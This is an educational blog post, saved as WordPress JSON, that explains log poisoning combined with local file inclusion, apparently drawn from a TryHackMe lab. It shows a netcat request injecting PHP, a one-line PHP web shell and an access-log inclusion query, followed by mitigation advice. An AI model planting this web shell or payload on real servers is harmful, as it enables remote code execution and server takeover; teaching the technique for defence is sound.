{"id":434,"date":"2024-02-03T19:39:54","date_gmt":"2024-02-04T01:39:54","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=434"},"modified":"2024-04-16T20:54:49","modified_gmt":"2024-04-17T01:54:49","slug":"what-is-log-poisoning","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","title":{"rendered":"What Is Log Poisoning?"},"content":{"rendered":"\n<p>Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems.<\/p>\n\n\n\n<p>Log poisoning involves attempting to compromise the integrity of these logs by injecting false or misleading information, altering timestamps, or manipulating the content in a way that misleads administrators or security personnel.<\/p>\n\n\n\n<p>Log poisoning can be used as part of a broader attack strategy to cover the tracks of unauthorized access or to create confusion during an investigation. Security measures such as log integrity checks, secure logging practices, and regular monitoring are crucial to detect and prevent log poisoning attempts. <\/p>\n\n\n\n<p>If an attacker can inject logs with malicious code that causes a Local File Inclusion (LFI) vulnerability, it would result in unauthorized Remote Code Execution (RCE), and sensitive data exposure. This might lead to a total compromise of the web server or the machine on which the web server is running.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">How Is It Done?<\/mark><\/h3>\n\n\n\n<p>The Log Poisoning technique is particularly stealthy because log files are shared and are a seemingly harmless part of web server operations. In a log poisoning attack, the attacker must first inject malicious PHP code into a log file. This can be done in various ways, such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Modifying the user agent with an evil payload <\/li>\n\n\n\n<li>Using NetCat to send a malicious file via URL<\/li>\n\n\n\n<li>Sending a malicious payload as part of the referrer header<\/li>\n<\/ul>\n\n\n\n<p>For example, if an attacker sends a Netcat request to the vulnerable machine containing a\u00a0<a>PHP<\/a>\u00a0code:<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"$ nc 10.10.10.10 80      \n&lt;?php echo phpinfo(); ?&gt;\nHTTP\/1.1 400 Bad Request\nDate: Thu, 23 Nov 2023 05:39:55 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nContent-Length: 335\nConnection: close\nContent-Type: text\/html; charset=iso-8859-1\n\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;400 Bad Request&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Bad Request&lt;\/h1&gt;\n&lt;p&gt;Your browser sent a request that this server could not understand.&lt;br \/&gt;\n&lt;\/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache\/2.4.41 (Ubuntu) Server at 10.10.10.10.eu-west-1.compute.internal Port 80&lt;\/address&gt;\n&lt;\/body&gt;&lt;\/html&gt;\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.10.10<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">80<\/span><span style=\"color: #BABED8\">      <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;?<\/span><span style=\"color: #BABED8\">php echo <\/span><span style=\"color: #82AAFF\">phpinfo<\/span><span style=\"color: #89DDFF\">();<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">?&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">HTTP\/1.1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">400<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Bad<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Thu,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">23<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nov<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">05<\/span><span style=\"color: #C3E88D\">:39:55<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">GMT<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Server:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Apache\/2.4.41<\/span><span style=\"color: #BABED8\"> (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Content-Length:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">335<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Connection:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">close<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Content-Type:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">text\/html<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> charset<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #C3E88D\">iso-8859-1<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;!<\/span><span style=\"color: #FFCB6B\">DOCTYPE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HTML<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">PUBLIC<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">-\/\/IETF\/\/DTD HTML 2.0\/\/EN<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">html&gt;&lt;head<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">title<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">400 Bad Request<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/title<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/head&gt;&lt;body<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">h<\/span><span style=\"color: #89DDFF\">1&gt;<\/span><span style=\"color: #BABED8\">Bad Request<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/h<\/span><span style=\"color: #89DDFF\">1&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">p<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">Your browser sent a request that this server could not understand.<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">br \/<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/p<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">hr<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">address<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">Apache\/2.4.41 <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">Ubuntu<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> Server at 10.10.10.10.eu-west-1.compute.internal Port <\/span><span style=\"color: #89DDFF\">80&lt;<\/span><span style=\"color: #BABED8\">\/address<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/body&gt;&lt;\/html<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Instead of just using the php code that just displays phpInfo page, an attacker can use a web shell instead which would give him RCE.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>An example of a web shell code can be seen below:<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;\" style=\"color:#f6f6f4;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula-soft\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F286C4\">&lt;?<\/span><span style=\"color: #BF9EEE\">php<\/span><span style=\"color: #F6F6F4\"> <\/span><span style=\"color: #97E1F1\">system<\/span><span style=\"color: #F6F6F4\">($_GET[<\/span><span style=\"color: #DEE492\">&quot;<\/span><span style=\"color: #E7EE98\">cmd<\/span><span style=\"color: #DEE492\">&quot;<\/span><span style=\"color: #F6F6F4\">]); <\/span><span style=\"color: #F286C4\">?&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The attacker then uses\u00a0<a>LFI<\/a>\u00a0to include the access log file:<\/p>\n\n\n\n<p><em><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><code>?page=\/var\/log\/apache2\/access.log<\/code>&amp;cmd=id<\/mark><\/strong><\/em><\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The code will then be logged in the server&#8217;s access logs.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/645b19f5d5848d004ab9c9e2\/room-content\/d9c19f6c916c790bb4fa94e09a5fcaef.png?ssl=1\" alt=\"Apache access log containing the injected PHP code\"\/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The attacker then uses&nbsp;<a>LFI<\/a>&nbsp;to include the access log file:&nbsp;<code>?page=\/var\/log\/apache2\/access.log<\/code><\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/645b19f5d5848d004ab9c9e2\/room-content\/f4a675e26aac4f257dfd24942bcdbd0f.png?ssl=1\" alt=\"Injected PHP code in the web access log has been executed\"\/><\/figure>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Mitigation<\/mark><\/h3>\n\n\n\n<p><br>Mitigating log poisoning involves implementing a combination of preventive measures, monitoring practices, and response strategies to ensure the integrity of log files. Here are several recommendations to help mitigate the risk of log poisoning:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Secure Logging Practices:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Use secure logging libraries and frameworks that handle input validation and sanitation to prevent injection attacks.<\/li>\n\n\n\n<li>Validate and sanitize user inputs before logging them to ensure that malicious data cannot manipulate log entries.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Access Control:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Implement strong access controls to restrict unauthorized access to log files.<\/li>\n\n\n\n<li>Limit user privileges, and ensure that only authorized personnel can modify or delete log files.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Encryption:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Encrypt log files or use encrypted channels for log transmission to protect against tampering during storage or transit.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Regular Monitoring:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Establish a routine for monitoring and reviewing log files for suspicious activities or anomalies.<\/li>\n\n\n\n<li>Set up alerts for unusual patterns, unexpected log entries, or unauthorized access to log files.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Log Integrity Checks:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Implement log integrity checks to detect any modifications or inconsistencies in log files.<\/li>\n\n\n\n<li>Hashing or digital signatures can be used to verify the integrity of log entries.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Centralized Logging:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Use centralized logging solutions to consolidate logs from different systems.<\/li>\n\n\n\n<li>Centralization can simplify monitoring and analysis, making it easier to detect anomalies across the entire infrastructure.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Timestamp Verification:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Regularly verify and cross-reference timestamps within log files to ensure consistency.<\/li>\n\n\n\n<li>Anomalies in timestamps may indicate tampering or manipulation.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Regular Auditing:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Conduct regular security audits to identify vulnerabilities and address them promptly.<\/li>\n\n\n\n<li>Include log management and monitoring in the audit process to ensure their effectiveness.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Incident Response Plan:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Develop and maintain an incident response plan that includes procedures for handling log-related incidents.<\/li>\n\n\n\n<li>Train staff on how to respond to log poisoning incidents promptly and effectively.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Keep Software Updated:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Ensure that all software, including logging tools and frameworks, is up-to-date with the latest security patches.<\/li>\n\n\n\n<li>Regularly update and patch the operating system and any dependencies.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>User Training and Awareness:<\/strong>\n<ul class=\"wp-block-list\">\n<li>Educate users and administrators about the importance of log security.<\/li>\n\n\n\n<li>Raise awareness about common attack vectors, such as log poisoning, and provide guidance on secure practices.<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p>By combining these measures, organizations can significantly reduce the risk of log poisoning and enhance the overall security of their systems. It&#8217;s important to adopt a proactive approach to security and regularly reassess and update security practices in response to evolving threats.<\/p>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h3>\n\n\n\n<p>Log poisoning involves manipulating or injecting false information into log files to mislead or compromise the integrity of the logs. The methods used for log poisoning can vary, and attackers may employ different techniques based on the vulnerabilities or weaknesses present in the target system. By combining the mitigation techniques mentioned above, log poisoning can be prevented.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning involves attempting to compromise the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,40,41,12],"tags":[],"class_list":["post-434","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-local-file-inclusion","category-log-poisoning","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":434,"position":0},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":638,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/06\/15\/palo-alto-firewall-initial-configuration\/","url_meta":{"origin":434,"position":1},"title":"Palo Alto Firewall: Initial Configuration","author":"ishsome","date":"June 15, 2024","format":false,"excerpt":"Embarking on the path to becoming a Network Security Engineer or already a seasoned Network Engineer interested in mastering Palo Alto firewalls? You've come to the right place. In this blog, we delve into the essential steps of configuring a Palo Alto firewall in EVE-NG, focusing on the initial setup.\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/06\/image-22.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":434,"position":2},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In &quot;Active Directory&quot;","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":434,"position":3},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":434,"position":4},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":434,"position":5},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 